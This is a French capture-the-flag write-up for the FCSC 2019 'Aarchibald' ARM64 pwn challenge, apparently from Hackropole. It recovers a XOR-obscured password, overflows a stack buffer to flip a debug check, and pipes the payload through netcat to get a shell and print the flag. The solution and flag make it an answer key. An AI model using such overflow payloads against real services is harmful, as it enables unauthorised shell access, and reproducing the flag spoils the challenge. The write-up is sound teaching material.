# Aarchibald

**Description**

Exploitez le binaire fourni pour extraire le flag du service distant.

Fichiers:
- [docker-compose.yml](https://hackropole.fr/challenges/fcsc2019-pwn-aarchibald/docker-compose.public.yml)
- [aarchibald](https://hackropole.fr/challenges/fcsc2019-pwn-aarchibald/public/aarchibald)


**Solution**

Quel est ce binaire ?

```
$ file aarchibald 
aarchibald: ELF 64-bit LSB pie executable, ARM aarch64, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-aarch64.so.1, for GNU/Linux 3.7.0, BuildID[sha1]=d8483190f176c46874dd383c62e36ee970712b09, not stripped
```

Je connais très mal l'ARM, mais le binaire n'est pas stripé, et puis, on a [ghidra](https://ghidra-sre.org/).
On y importe le binaire et on ouvre la fonction `main`:

```C
undefined8 main(void)
{
  int iVar1;
  byte local_28 [36];
  int local_4;
  
  local_4 = 0x45435343;
  puts("Please enter your password:");
  fflush((FILE *)0x0);
  fgets((char *)local_28,0x28,_stdin);
  len = 0xd;
  for (i = 0; i < 0xd; i = i + 1) {
    local_28[i] = local_28[i] ^ 0x36;
  }
  iVar1 = strncmp((char *)local_28,"eCfSDFwEeAYDr",0xd);
  if (iVar1 == 0) {
    puts("Welcome back!");
    fflush((FILE *)0x0);
    if (local_4 != 0x45435343) {
      puts("Entering debug mode");
      fflush((FILE *)0x0);
      system("/bin/dash");
    }
  }
  else {
    puts("Sorry, that\'s not the correct password.");
    puts("Bye.");
    fflush((FILE *)0x0);
  }
  return 0;
}
```

Le code est très compréhensible. D'abord on doit donner le mot de passe, 
qui est la chaîne `eCfSDFwEeAYDr` dont tous les bytes ont été XORés avec `0x36`.
Mais aussi, il faut qu'on écrase la variable locale `local_4` pour avoir un shell.
En effet, seuls les 15 premiers caractères de la saisie sont utilisés comme mot de passe,
le reste n'est pas contrôlé, ce qui autorise l'overflow.

D'abord le mot de passe. Dans un shell python :
```python
>>> bytes([ ord(x)^0x36 for x  in 'eCfSDFwEeAYDr'])
b'SuPerpAsSworD'
```

Ensuite le buffer est dimensionné à 36 caractères, on va dépasser un peu :
```shell
$ ( python -c 'print("SuPerpAsSworD" + "A"*36)' ; cat -)  | nc localhost 4000
Please enter your password:
Welcome back!
Entering debug mode
ls
aarchibald
flag
run.sh
cat flag
ECSC{32fb7ccc57121703b0a9a401e269e774c561b2bc}
^C
```